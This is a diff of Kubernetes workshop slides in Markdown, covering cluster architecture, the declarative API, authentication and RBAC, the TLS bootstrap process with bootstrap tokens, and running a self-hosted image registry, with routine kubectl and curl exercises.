|
||||
|
||||
---
|
||||
|
||||
## What runs on a node
|
||||
|
||||
- Our containerized workloads
|
||||
|
||||
- A container engine like Docker, CRI-O, containerd...
|
||||
|
||||
(in theory, the choice doesn't matter, as the engine is abstracted by Kubernetes)
|
||||
|
||||
- kubelet: an agent connecting the node to the cluster
|
||||
|
||||
(it connects to the API server, registers the node, receives instructions)
|
||||
|
||||
- kube-proxy: a component used for internal cluster communication
|
||||
|
||||
(note that this is *not* an overlay network or a CNI plugin!)
|
||||
|
||||
---
|
||||
|
||||
## What's in the control plane
|
||||
|
||||
- Everything is stored in etcd
|
||||
|
||||
(it's the only stateful component)
|
||||
|
||||
- Everyone communicates exclusively through the API server:
|
||||
|
||||
- we (users) interact with the cluster through the API server
|
||||
|
||||
- the nodes register and get their instructions through the API server
|
||||
|
||||
- the other control plane components also register with the API server
|
||||
|
||||
- API server is the only component that reads/writes from/to etcd
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: API server
|
||||
|
||||
- The API server exposes a REST API
|
||||
|
||||
(except for some calls, e.g. to attach interactively to a container)
|
||||
|
||||
- Almost all requests and responses are JSON following a strict format
|
||||
|
||||
- For performance, the requests and responses can also be done over protobuf
|
||||
|
||||
(see this [design proposal](https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md) for details)
|
||||
|
||||
- In practice, protobuf is used for all internal communication
|
||||
|
||||
(between control plane components, and with kubelet)
|
||||
|
||||
---
|
||||
|
||||
## Communication protocols: on the nodes
|
||||
|
||||
The kubelet agent uses a number of special-purpose protocols and interfaces, including:
|
||||
|
||||
- CRI (Container Runtime Interface)
|
||||
|
||||
- used for communication with the container engine
|
||||
- abstracts the differences between container engines
|
||||
- based on gRPC+protobuf
|
||||
|
||||
- [CNI (Container Network Interface)](https://github.com/containernetworking/cni/blob/master/SPEC.md)
|
||||
|
||||
- used for communication with network plugins
|
||||
- network plugins are implemented as executable programs invoked by kubelet
|
||||
- network plugins provide IPAM
|
||||
- network plugins set up network interfaces in pods
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
# The Kubernetes API
|
||||
|
||||
[
|
||||
*The Kubernetes API server is a "dumb server" which offers storage, versioning, validation, update, and watch semantics on API resources.*
|
||||
](
|
||||
https://github.com/kubernetes/community/blob/master/contributors/design-proposals/api-machinery/protobuf.md#proposal-and-motivation
|
||||
)
|
||||
|
||||
([Clayton Coleman](https://twitter.com/smarterclayton), Kubernetes Architect and Maintainer)
|
||||
|
||||
What does that mean?
|
||||
|
||||
---
|
||||
|
||||
## The Kubernetes API is declarative
|
||||
|
||||
- We cannot tell the API, "run a pod"
|
||||
|
||||
- We can tell the API, "here is the definition for pod X"
|
||||
|
||||
- The API server will store that definition (in etcd)
|
||||
|
||||
- *Controllers* will then wake up and create a pod matching the definition
|
||||
|
||||
---
|
||||
|
||||
## The core features of the Kubernetes API
|
||||
|
||||
- We can create, read, update, and delete objects
|
||||
|
||||
- We can also *watch* objects
|
||||
|
||||
(be notified when an object changes, or when an object of a given type is created)
|
||||
|
||||
- Objects are strongly typed
|
||||
|
||||
- Types are *validated* and *versioned*
|
||||
|
||||
- Storage and watch operations are provided by etcd
|
||||
|
||||
(note: the [k3s](https://k3s.io/) project allows us to use sqlite instead of etcd)
|
||||
|
||||
---
|
||||
|
||||
## Let's experiment a bit!
|
||||
|
||||
- For the exercises in this section, connect to the first node of the `test` cluster
|
||||
|
||||
.exercise[
|
||||
|
||||
- SSH to the first node of the test cluster
|
||||
|
||||
- Check that the cluster is operational:
|
||||
```bash
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
- All nodes should be `Ready`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Create
|
||||
|
||||
- Let's create a simple object
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a namespace with the following command:
|
||||
```bash
|
||||
kubectl create -f- <<EOF
|
||||
apiVersion: v1
|
||||
kind: Namespace
|
||||
metadata:
|
||||
name: hello
|
||||
EOF
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
This is equivalent to `kubectl create namespace hello`.
|
||||
|
||||
---
|
||||
|
||||
## Read
|
||||
|
||||
- Let's retrieve the object we just created
|
||||
|
||||
.exercise[
|
||||
|
||||
- Read back our object:
|
||||
```bash
|
||||
kubectl get namespace hello -o yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We see a lot of data that wasn't here when we created the object.
|
||||
|
||||
Some data was automatically added to the object (like `spec.finalizers`).
|
||||
|
||||
Some data is dynamic (typically, the content of `status`.)
|
||||
|
||||
---
|
||||
|
||||
## API requests and responses
|
||||
|
||||
- Almost every Kubernetes API payload (requests and responses) has the same format:
|
||||
```yaml
|
||||
apiVersion: xxx
|
||||
kind: yyy
|
||||
metadata:
|
||||
name: zzz
|
||||
(more metadata fields here)
|
||||
(more fields here)
|
||||
```
|
||||
|
||||
- The fields shown above are mandatory, except for some special cases
|
||||
|
||||
(e.g.: in lists of resources, the list itself doesn't have a `metadata.name`)
|
||||
|
||||
- We show YAML for convenience, but the API uses JSON
|
||||
|
||||
(with optional protobuf encoding)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## API versions
|
||||
|
||||
- The `apiVersion` field corresponds to an *API group*
|
||||
|
||||
- It can be either `v1` (aka "core" group or "legacy group"), or `group/versions`; e.g.:
|
||||
|
||||
- `apps/v1`
|
||||
- `rbac.authorization.k8s.io/v1`
|
||||
- `extensions/v1beta1`
|
||||
|
||||
- It does not indicate which version of Kubernetes we're talking about
|
||||
|
||||
- It *indirectly* indicates the version of the `kind`
|
||||
|
||||
(which fields exist, their format, which ones are mandatory...)
|
||||
|
||||
- A single resource type (`kind`) is rarely versioned alone
|
||||
|
||||
(e.g.: the `batch` API group contains `jobs` and `cronjobs`)
|
||||
|
||||
---
|
||||
|
||||
## Update
|
||||
|
||||
- Let's update our namespace object
|
||||
|
||||
- There are many ways to do that, including:
|
||||
|
||||
- `kubectl apply` (and provide an updated YAML file)
|
||||
- `kubectl edit`
|
||||
- `kubectl patch`
|
||||
- many helpers, like `kubectl label`, or `kubectl set`
|
||||
|
||||
- In each case, `kubectl` will:
|
||||
|
||||
- get the current definition of the object
|
||||
- compute changes
|
||||
- submit the changes (with `PATCH` requests)
|
||||
|
||||
---
|
||||
|
||||
## Adding a label
|
||||
|
||||
- For demonstration purposes, let's add a label to the namespace
|
||||
|
||||
- The easiest way is to use `kubectl label`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In one terminal, watch namespaces:
|
||||
```bash
|
||||
kubectl get namespaces --show-labels -w
|
||||
```
|
||||
|
||||
- In the other, update our namespace:
|
||||
```bash
|
||||
kubectl label namespaces hello color=purple
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We demonstrated *update* and *watch* semantics.
|
||||
|
||||
---
|
||||
|
||||
## What's special about *watch*?
|
||||
|
||||
- The API server itself doesn't do anything: it's just a fancy object store
|
||||
|
||||
- All the actual logic in Kubernetes is implemented with *controllers*
|
||||
|
||||
- A *controller* watches a set of resources, and takes action when they change
|
||||
|
||||
- Examples:
|
||||
|
||||
- when a Pod object is created, it gets scheduled and started
|
||||
|
||||
- when a Pod belonging to a ReplicaSet terminates, it gets replaced
|
||||
|
||||
- when a Deployment object is updated, it can trigger a rolling update
|
||||
|
||||
---
|
||||
|
||||
# Other control plane components
|
||||
|
||||
- API server ✔️
|
||||
|
||||
- etcd ✔️
|
||||
|
||||
- Controller manager
|
||||
|
||||
- Scheduler
|
||||
|
||||
---
|
||||
|
||||
## Controller manager
|
||||
|
||||
- This is a collection of loops watching all kinds of objects
|
||||
|
||||
- That's where the actual logic of Kubernetes lives
|
||||
|
||||
- When we create a Deployment (e.g. with `kubectl run web --image=nginx`),
|
||||
|
||||
- we create a Deployment object
|
||||
|
||||
- the Deployment controller notices it, and creates a ReplicaSet
|
||||
|
||||
- the ReplicaSet controller notices the ReplicaSet, and creates a Pod
|
||||
|
||||
---
|
||||
|
||||
## Scheduler
|
||||
|
||||
- When a pod is created, it is in `Pending` state
|
||||
|
||||
- The scheduler (or rather: *a scheduler*) must bind it to a node
|
||||
|
||||
- Kubernetes comes with an efficient scheduler with many features
|
||||
|
||||
- if we have special requirements, we can add another scheduler
|
||||
<br/>
|
||||
(example: this [demo scheduler](https://github.com/kelseyhightower/scheduler) uses the cost of nodes, stored in node annotations)
|
||||
|
||||
- A pod might stay in `Pending` state for a long time:
|
||||
|
||||
- if the cluster is full
|
||||
|
||||
- if the pod has special constraints that can't be met
|
||||
|
||||
- if the scheduler is not running (!)
|
||||
@@ -22,7 +22,7 @@
|
||||
|
||||
- When the API server receives a request, it tries to authenticate it
|
||||
|
||||
(it examines headers, certificates ... anything available)
|
||||
(it examines headers, certificates... anything available)
|
||||
|
||||
- Many authentication methods are available and can be used simultaneously
|
||||
|
||||
@@ -34,7 +34,7 @@
|
||||
- the user ID
|
||||
- a list of groups
|
||||
|
||||
- The API server doesn't interpret these; it'll be the job of *authorizers*
|
||||
- The API server doesn't interpret these; that'll be the job of *authorizers*
|
||||
|
||||
---
|
||||
|
||||
@@ -50,7 +50,7 @@
|
||||
|
||||
- [HTTP basic auth](https://en.wikipedia.org/wiki/Basic_access_authentication)
|
||||
|
||||
(carrying user and password in a HTTP header)
|
||||
(carrying user and password in an HTTP header)
|
||||
|
||||
- Authentication proxy
|
||||
|
||||
@@ -64,7 +64,7 @@
|
||||
|
||||
(`401 Unauthorized` HTTP code)
|
||||
|
||||
- If a request is neither accepted nor accepted by anyone, it's anonymous
|
||||
- If a request is neither rejected nor accepted by anyone, it's anonymous
|
||||
|
||||
- the user name is `system:anonymous`
|
||||
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
(i.e. they are not stored in etcd or anywhere else)
|
||||
|
||||
- Users can be created (and given membership to groups) independently of the API
|
||||
- Users can be created (and added to groups) independently of the API
|
||||
|
||||
- The Kubernetes API can be set up to use your custom CA to validate client certs
|
||||
|
||||
@@ -108,7 +108,7 @@ class: extra-details
|
||||
--raw \
|
||||
-o json \
|
||||
| jq -r .users[0].user[\"client-certificate-data\"] \
|
||||
| base64 -d \
|
||||
| openssl base64 -d -A \
|
||||
| openssl x509 -text \
|
||||
| grep Subject:
|
||||
```
|
||||
@@ -127,7 +127,7 @@ class: extra-details
|
||||
- `--raw` includes certificate information (which shows as REDACTED otherwise)
|
||||
- `-o json` outputs the information in JSON format
|
||||
- `| jq ...` extracts the field with the user certificate (in base64)
|
||||
- `| base64 -d` decodes the base64 format (now we have a PEM file)
|
||||
- `| openssl base64 -d -A` decodes the base64 format (now we have a PEM file)
|
||||
- `| openssl x509 -text` parses the certificate and outputs it as plain text
|
||||
- `| grep Subject:` shows us the line that interests us
|
||||
|
||||
@@ -143,19 +143,21 @@ class: extra-details
|
||||
|
||||
(see issue [#18982](https://github.com/kubernetes/kubernetes/issues/18982))
|
||||
|
||||
- As a result, we cannot easily suspend a user's access
|
||||
- As a result, we don't have an easy way to terminate someone's access
|
||||
|
||||
- There are workarounds, but they are very inconvenient:
|
||||
(if their key is compromised, or they leave the organization)
|
||||
|
||||
- issue short-lived certificates (e.g. 24 hours) and regenerate them often
|
||||
- Option 1: re-create a new CA and re-issue everyone's certificates
|
||||
<br/>
|
||||
→ Maybe OK if we only have a few users; no way otherwise
|
||||
|
||||
- re-create the CA and re-issue all certificates in case of compromise
|
||||
- Option 2: don't use groups; grant permissions to individual users
|
||||
<br/>
|
||||
→ Inconvenient if we have many users and teams; error-prone
|
||||
|
||||
- grant permissions to individual users, not groups
|
||||
<br/>
|
||||
(and remove all permissions to a compromised user)
|
||||
|
||||
- Until this is fixed, we probably want to use other methods
|
||||
- Option 3: issue short-lived certificates (e.g. 24 hours) and renew them often
|
||||
<br/>
|
||||
→ This can be facilitated by e.g. Vault or by the Kubernetes CSR API
|
||||
|
||||
---
|
||||
|
||||
@@ -191,7 +193,7 @@ class: extra-details
|
||||
|
||||
(the kind that you can view with `kubectl get secrets`)
|
||||
|
||||
- Service accounts are generally used to grant permissions to applications, services ...
|
||||
- Service accounts are generally used to grant permissions to applications, services...
|
||||
|
||||
(as opposed to humans)
|
||||
|
||||
@@ -215,7 +217,7 @@ class: extra-details
|
||||
|
||||
.exercise[
|
||||
|
||||
- The resource name is `serviceaccount` or `sa` in short:
|
||||
- The resource name is `serviceaccount` or `sa` for short:
|
||||
```bash
|
||||
kubectl get sa
|
||||
```
|
||||
@@ -260,7 +262,7 @@ class: extra-details
|
||||
- Extract the token and decode it:
|
||||
```bash
|
||||
TOKEN=$(kubectl get secret $SECRET -o json \
|
||||
| jq -r .data.token | base64 -d)
|
||||
| jq -r .data.token | openssl base64 -d -A)
|
||||
```
|
||||
|
||||
]
|
||||
@@ -307,7 +309,7 @@ class: extra-details
|
||||
|
||||
- The API "sees" us as a different user
|
||||
|
||||
- But neither user has any right, so we can't do nothin'
|
||||
- But neither user has any rights, so we can't do nothin'
|
||||
|
||||
- Let's change that!
|
||||
|
||||
@@ -337,9 +339,9 @@ class: extra-details
|
||||
|
||||
- A rule is a combination of:
|
||||
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete ...
|
||||
- [verbs](https://kubernetes.io/docs/reference/access-authn-authz/authorization/#determine-the-request-verb) like create, get, list, update, delete...
|
||||
|
||||
- resources (as in "API resource", like pods, nodes, services ...)
|
||||
- resources (as in "API resource," like pods, nodes, services...)
|
||||
|
||||
- resource names (to specify e.g. one specific pod instead of all pods)
|
||||
|
||||
@@ -373,13 +375,13 @@ class: extra-details
|
||||
|
||||
- We can also define API resources ClusterRole and ClusterRoleBinding
|
||||
|
||||
- These are a superset, allowing to:
|
||||
- These are a superset, allowing us to:
|
||||
|
||||
- specify actions on cluster-wide objects (like nodes)
|
||||
|
||||
- operate across all namespaces
|
||||
|
||||
- We can create Role and RoleBinding resources within a namespaces
|
||||
- We can create Role and RoleBinding resources within a namespace
|
||||
|
||||
- ClusterRole and ClusterRoleBinding resources are global
|
||||
|
||||
@@ -387,13 +389,13 @@ class: extra-details
|
||||
|
||||
## Pods and service accounts
|
||||
|
||||
- A pod can be associated to a service account
|
||||
- A pod can be associated with a service account
|
||||
|
||||
- by default, it is associated to the `default` service account
|
||||
- by default, it is associated with the `default` service account
|
||||
|
||||
- as we've seen earlier, this service account has no permission anyway
|
||||
- as we saw earlier, this service account has no permissions anyway
|
||||
|
||||
- The associated token is exposed into the pod's filesystem
|
||||
- The associated token is exposed to the pod's filesystem
|
||||
|
||||
(in `/var/run/secrets/kubernetes.io/serviceaccount/token`)
|
||||
|
||||
@@ -407,7 +409,7 @@ class: extra-details
|
||||
|
||||
- We are going to create a service account
|
||||
|
||||
- We will use an existing cluster role (`view`)
|
||||
- We will use a default cluster role (`view`)
|
||||
|
||||
- We will bind together this role and this service account
|
||||
|
||||
@@ -458,7 +460,7 @@ class: extra-details
|
||||
|
||||
]
|
||||
|
||||
It's important to note a couple of details in these flags ...
|
||||
It's important to note a couple of details in these flags...
|
||||
|
||||
---
|
||||
|
||||
@@ -491,13 +493,13 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
- again, the command would have worked fine (no error)
|
||||
|
||||
- ... but our API requests would have been denied later
|
||||
- ...but our API requests would have been denied later
|
||||
|
||||
- What's about the `default:` prefix?
|
||||
|
||||
- that's the namespace of the service account
|
||||
|
||||
- yes, it could be inferred from context, but ... `kubectl` requires it
|
||||
- yes, it could be inferred from context, but... `kubectl` requires it
|
||||
|
||||
---
|
||||
|
||||
@@ -574,6 +576,51 @@ It's important to note a couple of details in these flags ...
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where does this `view` role come from?
|
||||
|
||||
- Kubernetes defines a number of ClusterRoles intended to be bound to users
|
||||
|
||||
- `cluster-admin` can do *everything* (think `root` on UNIX)
|
||||
|
||||
- `admin` can do *almost everything* (except e.g. changing resource quotas and limits)
|
||||
|
||||
- `edit` is similar to `admin`, but cannot view or edit permissions
|
||||
|
||||
- `view` has read-only access to most resources, except permissions and secrets
|
||||
|
||||
*In many situations, these roles will be all you need.*
|
||||
|
||||
*You can also customize them!*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Customizing the default roles
|
||||
|
||||
- If you need to *add* permissions to these default roles (or others),
|
||||
<br/>
|
||||
you can do it through the [ClusterRole Aggregation](https://kubernetes.io/docs/reference/access-authn-authz/rbac/#aggregated-clusterroles) mechanism
|
||||
|
||||
- This happens by creating a ClusterRole with the following labels:
|
||||
```yaml
|
||||
metadata:
|
||||
labels:
|
||||
rbac.authorization.k8s.io/aggregate-to-admin: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-edit: "true"
|
||||
rbac.authorization.k8s.io/aggregate-to-view: "true"
|
||||
```
|
||||
|
||||
- This ClusterRole permissions will be added to `admin`/`edit`/`view` respectively
|
||||
|
||||
- This is particulary useful when using CustomResourceDefinitions
|
||||
|
||||
(since Kubernetes cannot guess which resources are sensitive and which ones aren't)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Where do our permissions come from?
|
||||
|
||||
- When interacting with the Kubernetes API, we are using a client certificate
|
||||
@@ -605,9 +652,32 @@ class: extra-details
|
||||
kubectl describe clusterrolebinding cluster-admin
|
||||
```
|
||||
|
||||
- This binding associates `system:masters` to the cluster role `cluster-admin`
|
||||
- This binding associates `system:masters` with the cluster role `cluster-admin`
|
||||
|
||||
- And the `cluster-admin` is, basically, `root`:
|
||||
```bash
|
||||
kubectl describe clusterrole cluster-admin
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Figuring out who can do what
|
||||
|
||||
- For auditing purposes, sometimes we want to know who can perform an action
|
||||
|
||||
- There is a proof-of-concept tool by Aqua Security which does exactly that:
|
||||
|
||||
https://github.com/aquasecurity/kubectl-who-can
|
||||
|
||||
- This is one way to install it:
|
||||
```bash
|
||||
docker run --rm -v /usr/local/bin:/go/bin golang \
|
||||
go get -v github.com/aquasecurity/kubectl-who-can
|
||||
```
|
||||
|
||||
- This is one way to use it:
|
||||
```bash
|
||||
kubectl-who-can create pods
|
||||
```
|
||||
|
||||
259
slides/k8s/bootstrap.md
Normal file
@@ -0,0 +1,259 @@
|
||||
# TLS bootstrap
|
||||
|
||||
- kubelet needs TLS keys and certificates to communicate with the control plane
|
||||
|
||||
- How do we generate this information?
|
||||
|
||||
- How do we make it available to kubelet?
|
||||
|
||||
---
|
||||
|
||||
## Option 1: push
|
||||
|
||||
- When we want to provision a node:
|
||||
|
||||
- generate its keys, certificate, and sign centrally
|
||||
|
||||
- push the files to the node
|
||||
|
||||
- OK for "traditional", on-premises deployments
|
||||
|
||||
- Not OK for cloud deployments with auto-scaling
|
||||
|
||||
---
|
||||
|
||||
## Option 2: poll + push
|
||||
|
||||
- Discover nodes when they are created
|
||||
|
||||
(e.g. with cloud API)
|
||||
|
||||
- When we detect a new node, push TLS material to the node
|
||||
|
||||
(like in option 1)
|
||||
|
||||
- It works, but:
|
||||
|
||||
- discovery code is specific to each provider
|
||||
|
||||
- relies heavily on the cloud provider API
|
||||
|
||||
- doesn't work on-premises
|
||||
|
||||
- doesn't scale
|
||||
|
||||
---
|
||||
|
||||
## Option 3: bootstrap tokens + CSR API
|
||||
|
||||
- Since Kubernetes 1.4, the Kubernetes API supports CSR
|
||||
|
||||
(Certificate Signing Requests)
|
||||
|
||||
- This is similar to the protocol used to obtain e.g. HTTPS certificates:
|
||||
|
||||
- subject (here, kubelet) generates TLS keys and CSR
|
||||
|
||||
- subject submits CSR to CA
|
||||
|
||||
- CA validates (or not) the CSR
|
||||
|
||||
- CA sends back signed certificate to subject
|
||||
|
||||
- This is combined with *bootstrap tokens*
|
||||
|
||||
---
|
||||
|
||||
## Bootstrap tokens
|
||||
|
||||
- A [bootstrap token](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/) is an API access token
|
||||
|
||||
- it is a Secret with type `bootstrap.kubernetes.io/token`
|
||||
|
||||
- it is 6 public characters (ID) + 16 secret characters
|
||||
<br/>(example: `whd3pq.d1ushuf6ccisjacu`)
|
||||
|
||||
- it gives access to groups `system:bootstrap:<ID>` and `system:bootstrappers`
|
||||
|
||||
- additional groups can be specified in the Secret
|
||||
|
||||
---
|
||||
|
||||
## Bootstrap tokens with kubeadm
|
||||
|
||||
- kubeadm automatically creates a bootstrap token
|
||||
|
||||
(it is shown at the end of `kubeadm init`)
|
||||
|
||||
- That token adds the group `system:bootstrappers:kubeadm:default-node-token`
|
||||
|
||||
- kubeadm also creates a ClusterRoleBinding `kubeadm:kubelet-bootstrap`
|
||||
<br/>binding `...:default-node-token` to ClusterRole `system:node-bootstrapper`
|
||||
|
||||
- That ClusterRole gives create/get/list/watch permissions on the CSR API
|
||||
|
||||
---
|
||||
|
||||
## Bootstrap tokens in practice
|
||||
|
||||
- Let's list our bootstrap tokens on a cluster created with kubeadm
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into node `test1`
|
||||
|
||||
- View bootstrap tokens:
|
||||
```bash
|
||||
sudo kubeadm token list
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
- Tokens are short-lived
|
||||
|
||||
- We can create new tokens with `kubeadm` if necessary
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Retrieving bootstrap tokens with kubectl
|
||||
|
||||
- Bootstrap tokens are Secrets with type `bootstrap.kubernetes.io/token`
|
||||
|
||||
- Token ID and secret are in data fields `token-id` and `token-secret`
|
||||
|
||||
- In Secrets, data fields are encoded with Base64
|
||||
|
||||
- This "very simple" command will show us the tokens:
|
||||
|
||||
```
|
||||
kubectl -n kube-system get secrets -o json |
|
||||
jq -r '.items[]
|
||||
| select(.type=="bootstrap.kubernetes.io/token")
|
||||
| ( .data["token-id"] + "Lg==" + .data["token-secret"] + "Cg==")
|
||||
' | base64 -d
|
||||
```
|
||||
|
||||
(On recent versions of `jq`, you can simplify by using filter `@base64d`.)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Using a bootstrap token
|
||||
|
||||
- The token we need to use has the form `abcdef.1234567890abcdef`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that it is accepted by the API server:
|
||||
```bash
|
||||
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef"
|
||||
```
|
||||
|
||||
- We should see that we are *authenticated* but not *authorized*:
|
||||
```
|
||||
User \"system:bootstrap:abcdef\" cannot get path \"/\""
|
||||
```
|
||||
|
||||
- Check that we can access the CSR API:
|
||||
```bash
|
||||
curl -k -H "Authorization: Bearer abcdef.1234567890abcdef" \
|
||||
https://10.96.0.1/apis/certificates.k8s.io/v1beta1/certificatesigningrequests
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## The cluster-info ConfigMap
|
||||
|
||||
- Before we can talk to the API, we need:
|
||||
|
||||
- the API server address (obviously!)
|
||||
|
||||
- the cluster CA certificate
|
||||
|
||||
- That information is stored in a public ConfigMap
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve that ConfigMap:
|
||||
```bash
|
||||
curl -k https://10.96.0.1/api/v1/namespaces/kube-public/configmaps/cluster-info
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Extracting the kubeconfig file is left as an exercise for the reader.*
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Signature of the config-map
|
||||
|
||||
- You might have noticed a few `jws-kubeconfig-...` fields
|
||||
|
||||
- These are config-map signatures
|
||||
|
||||
(so that the client can protect against MITM attacks)
|
||||
|
||||
- These are JWS signatures using HMAC-SHA256
|
||||
|
||||
(see [here](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/#configmap-signing) for more details)
|
||||
|
||||
---
|
||||
|
||||
## Putting it all together
|
||||
|
||||
This is the TLS bootstrap mechanism, step by step.
|
||||
|
||||
- The node uses the cluster-info ConfigMap to get the cluster CA certificate
|
||||
|
||||
- The node generates its keys and CSR
|
||||
|
||||
- Using the bootstrap token, the node creates a CertificateSigningRequest object
|
||||
|
||||
- The node watches the CSR object
|
||||
|
||||
- The CSR object is accepted (automatically or by an admin)
|
||||
|
||||
- The node gets notified, and retrieves the certificate
|
||||
|
||||
- The node can now join the cluster
|
||||
|
||||
---
|
||||
|
||||
## Bottom line
|
||||
|
||||
- If you paid attention, we still need a way to:
|
||||
|
||||
- either safely get the bootstrap token to the nodes
|
||||
|
||||
- or disable auto-approval and manually approve the nodes when they join
|
||||
|
||||
- The goal of the TLS bootstrap mechanism is *not* to solve this
|
||||
|
||||
(in terms of information knowledge, it's fundamentally impossible!)
|
||||
|
||||
- But it reduces the differences between environments, infrastructures, providers ...
|
||||
|
||||
- It gives a mechanism that is easier to use, and flexible enough, for most scenarios
|
||||
|
||||
---
|
||||
|
||||
## More information
|
||||
|
||||
- As always, the Kubernetes documentation has extra details:
|
||||
|
||||
- [TLS management](https://kubernetes.io/docs/tasks/tls/managing-tls-in-a-cluster/)
|
||||
|
||||
- [Authenticating with bootstrap tokens](https://kubernetes.io/docs/reference/access-authn-authz/bootstrap-tokens/)
|
||||
|
||||
- [TLS bootstrapping](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-tls-bootstrapping/)
|
||||
|
||||
- [kubeadm token](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-token/) command
|
||||
|
||||
- [kubeadm join](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/) command (has details about [the join workflow](https://kubernetes.io/docs/reference/setup-tools/kubeadm/kubeadm-join/#join-workflow))
|
||||
40
slides/k8s/buildshiprun-dockerhub.md
Normal file
@@ -0,0 +1,40 @@
|
||||
## Using images from the Docker Hub
|
||||
|
||||
- For everyone's convenience, we took care of building DockerCoins images
|
||||
|
||||
- We pushed these images to the DockerHub, under the [dockercoins](https://hub.docker.com/u/dockercoins) user
|
||||
|
||||
- These images are *tagged* with a version number, `v0.1`
|
||||
|
||||
- The full image names are therefore:
|
||||
|
||||
- `dockercoins/hasher:v0.1`
|
||||
|
||||
- `dockercoins/rng:v0.1`
|
||||
|
||||
- `dockercoins/webui:v0.1`
|
||||
|
||||
- `dockercoins/worker:v0.1`
|
||||
|
||||
---
|
||||
|
||||
## Setting `$REGISTRY` and `$TAG`
|
||||
|
||||
- In the upcoming exercises and labs, we use a couple of environment variables:
|
||||
|
||||
- `$REGISTRY` as a prefix to all image names
|
||||
|
||||
- `$TAG` as the image version tag
|
||||
|
||||
- For example, the worker image is `$REGISTRY/worker:$TAG`
|
||||
|
||||
- If you copy-paste the commands in these exercises:
|
||||
|
||||
**make sure that you set `$REGISTRY` and `$TAG` first!**
|
||||
|
||||
- For example:
|
||||
```
|
||||
export REGISTRY=dockercoins TAG=v0.1
|
||||
```
|
||||
|
||||
(this will expand `$REGISTRY/worker:$TAG` to `dockercoins/worker:v0.1`)
|
||||
235
slides/k8s/buildshiprun-selfhosted.md
Normal file
@@ -0,0 +1,235 @@
|
||||
## Self-hosting our registry
|
||||
|
||||
*Note: this section shows how to run the Docker
|
||||
open source registry and use it to ship images
|
||||
on our cluster. While this method works fine,
|
||||
we recommend that you consider using one of the
|
||||
hosted, free automated build services instead.
|
||||
It will be much easier!*
|
||||
|
||||
*If you need to run a registry on premises,
|
||||
this section gives you a starting point, but
|
||||
you will need to make a lot of changes so that
|
||||
the registry is secured, highly available, and
|
||||
so that your build pipeline is automated.*
|
||||
|
||||
---
|
||||
|
||||
## Using the open source registry
|
||||
|
||||
- We need to run a `registry` container
|
||||
|
||||
- It will store images and layers to the local filesystem
|
||||
<br/>(but you can add a config file to use S3, Swift, etc.)
|
||||
|
||||
- Docker *requires* TLS when communicating with the registry
|
||||
|
||||
- unless for registries on `127.0.0.0/8` (i.e. `localhost`)
|
||||
|
||||
- or with the Engine flag `--insecure-registry`
|
||||
|
||||
- Our strategy: publish the registry container on a NodePort,
|
||||
<br/>so that it's available through `127.0.0.1:xxxxx` on each node
|
||||
|
||||
---
|
||||
|
||||
## Deploying a self-hosted registry
|
||||
|
||||
- We will deploy a registry container, and expose it with a NodePort
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the registry service:
|
||||
```bash
|
||||
kubectl create deployment registry --image=registry
|
||||
```
|
||||
|
||||
- Expose it on a NodePort:
|
||||
```bash
|
||||
kubectl expose deploy/registry --port=5000 --type=NodePort
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Connecting to our registry
|
||||
|
||||
- We need to find out which port has been allocated
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the service details:
|
||||
```bash
|
||||
kubectl describe svc/registry
|
||||
```
|
||||
|
||||
- Get the port number programmatically:
|
||||
```bash
|
||||
NODEPORT=$(kubectl get svc/registry -o json | jq .spec.ports[0].nodePort)
|
||||
REGISTRY=127.0.0.1:$NODEPORT
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Testing our registry
|
||||
|
||||
- A convenient Docker registry API route to remember is `/v2/_catalog`
|
||||
|
||||
.exercise[
|
||||
|
||||
<!-- ```hide kubectl wait deploy/registry --for condition=available```-->
|
||||
|
||||
- View the repositories currently held in our registry:
|
||||
```bash
|
||||
curl $REGISTRY/v2/_catalog
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We should see:
|
||||
```json
|
||||
{"repositories":[]}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Testing our local registry
|
||||
|
||||
- We can retag a small image, and push it to the registry
|
||||
|
||||
.exercise[
|
||||
|
||||
- Make sure we have the busybox image, and retag it:
